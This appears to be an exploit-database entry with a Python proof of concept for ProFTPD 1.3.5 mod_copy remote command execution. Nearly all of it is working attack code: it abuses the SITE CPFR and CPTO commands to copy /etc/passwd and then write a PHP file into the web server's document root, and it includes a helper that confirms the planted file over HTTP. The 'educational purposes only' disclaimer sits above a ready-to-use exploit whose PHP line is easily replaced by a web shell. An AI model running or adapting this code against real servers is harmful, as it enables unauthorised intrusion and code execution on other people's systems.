Exploits / Vulnerability Discovered : 2021-05-26 |
Type : remote |
Platform : linux
This exploit / vulnerability Proftpd 1.3.5 mod_copy remote command execution (2) is for educational purposes only and if it is used you will do on your own risk!
def exploit(client, target):
client.connect((target,21)) # Connecting to the target server
banner = client.recv(74)
print(banner.decode())
client.send(b'site cpfr /etc/passwd\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto <?php phpinfo(); ?>\r\n') # phpinfo() is just a PoC.
print(client.recv(1024).decode())
client.send(b'site cpfr /proc/self/fd/3\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto /var/www/html/test.php\r\n')
print(client.recv(1024).decode())
client.close()
print('Exploit Completed')
def check(url):
req = requests.get(url) # Requesting the written PoC php file via HTTP
if req.status_code == 200:
print('[+] File Written Successfully')
print(f'[+] Go to : {url}')
else:
print('[!] Something Went Wrong')
print('[!] Directory might not be writable')